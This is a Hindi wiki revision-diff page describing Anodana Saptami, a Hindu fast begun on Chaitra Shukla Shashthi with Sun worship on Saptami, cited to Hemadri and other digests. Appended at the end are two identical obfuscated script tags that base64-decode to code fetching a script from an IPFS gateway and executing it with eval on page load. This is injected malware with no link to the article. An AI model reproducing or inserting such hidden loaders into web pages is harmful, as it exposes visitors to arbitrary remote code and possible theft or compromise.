Difference between revisions of "अनोदना सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*चैत्र शुक्ल की [[षष्ठी]] को उपवास से आरम्भ तथा [[सप्तमी]] पर सूर्य पूजा की जाती है। <ref> हेमाद्रि व्रतखण्ड (1, 702–5, भविष्य); कृत्यकल्पतरु (व्रत0 205–8); कृत्यरत्नाकर (121–23)</ref>
+
*[[चैत्र]] [[शुक्ल पक्ष]] की [[षष्ठी]] को उपवास से आरम्भ तथा [[सप्तमी]] पर [[सूर्य]] पूजा की जाती है। <ref>हेमाद्रि व्रतखण्ड (1, 702–5, भविष्य); कृत्यकल्पतरु (व्रत0 205–8); कृत्यरत्नाकर (121–23</ref>
 
*'ओदन' में भक्ष्य, भोज्य एवं लेह्य (चाटना) सम्मिलित है, किन्तु जल ओदन नहीं है, अतः उस दिन ग्रहण किया जा सकता है।
 
*'ओदन' में भक्ष्य, भोज्य एवं लेह्य (चाटना) सम्मिलित है, किन्तु जल ओदन नहीं है, अतः उस दिन ग्रहण किया जा सकता है।
{{लेख प्रगति
+
 
|आधार=
+
{{संदर्भ ग्रंथ}}
|प्रारम्भिक=प्रारम्भिक1
+
==टीका टिप्पणी और संदर्भ==
|माध्यमिक=
+
<references/>
|पूर्णता=
 
|शोध=
 
}}
 
 
==अन्य संबंधित लिंक==
 
==अन्य संबंधित लिंक==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
==टीका टिप्पणी और संदर्भ==
+
{{व्रत और उत्सव}}
<references/>
+
[[Category:पर्व और त्योहार]]
 
[[Category:व्रत और उत्सव]]
 
[[Category:व्रत और उत्सव]]
 +
[[Category:संस्कृति कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:36, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl paksh ki shashthi ko upavas se arambh tatha saptami par soory pooja ki jati hai. [1]
  • 'odan' mean bhakshy, bhojy evan lehy (chatana) sammilit hai, kintu jal odan nahian hai, atah us din grahan kiya ja sakata hai.


tika tippani aur sandarbh

  1. hemadri vratakhand (1, 702–5, bhavishy); krityakalpataru (vrat0 205–8); krityaratnakar (121–23

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>